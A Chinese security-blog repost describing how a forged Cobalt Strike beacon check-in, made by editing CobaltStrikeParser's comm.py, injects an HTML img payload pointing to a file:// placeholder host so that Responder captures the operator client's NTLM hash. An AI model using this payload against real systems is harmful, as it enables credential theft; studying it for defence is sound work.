CTF导航 CTF导航

CobaltStrike XSS利用新姿势

渗透技巧 2年前 (2022) admin
570 0 0

Jas502n大佬的思路

CobaltStrike XSS利用新姿势



使用此工具建立监听:https://github.com/lgandx/Responder

CobaltStrike XSS利用新姿势


https://github.com/Sentinel-One/CobaltStrikeParser/

修改 comm.py39行,为payload<html>< img src=’file://x.x.x.x/xx’%>

CobaltStrike XSS利用新姿势

CobaltStrike XSS利用新姿势

伪造上线

CobaltStrike XSS利用新姿势


CS上线,user 处为我们设置的 payload

CobaltStrike XSS利用新姿势


Responder 脚本抓到客户机 hash

CobaltStrike XSS利用新姿势


原文始发于微信公众号(刨洞技术交流):CobaltStrike XSS利用新姿势

版权声明:admin 发表于 2022年9月23日 下午4:14。
转载请注明:CobaltStrike XSS利用新姿势 | CTF导航

相关文章

某科网威-防火墙控制系统-任意文件读取+密码泄露
admin
299
Bleeding Wall: A Hematologic Examination on the Great Firewall
admin
24
性骚扰事件中的AirDrop(隔空投送)日志分析
admin
1,171
DynamicDotNet: A collection of various and sundry code snippets that leverage .NET dynamic tradecraft
admin
386
Mimikatz Explorer – Custom SSP
admin
261
API安全应用场景系列开篇
admin
429

暂无评论

您必须登录才能参与评论!
立即登录
暂无评论...

相关文章

Identifying APs With Hidden SSIDs
0
Judge0 Sandbox Escape
0
每日安全动态推送(4-30)
0
初遇内嵌WebShell的pdf文件
0
新一代供应链安全攻击面
0
Dumppassword – ThivingFox
0
CVE-2024-4040
0
見落としがちなURL正規化によるパストラバーサル
0
CVE-2024-21111 – Local Privilege Escalation in Oracle VirtualBox
0
kkFileView文件上传导致远程代码执行漏洞
0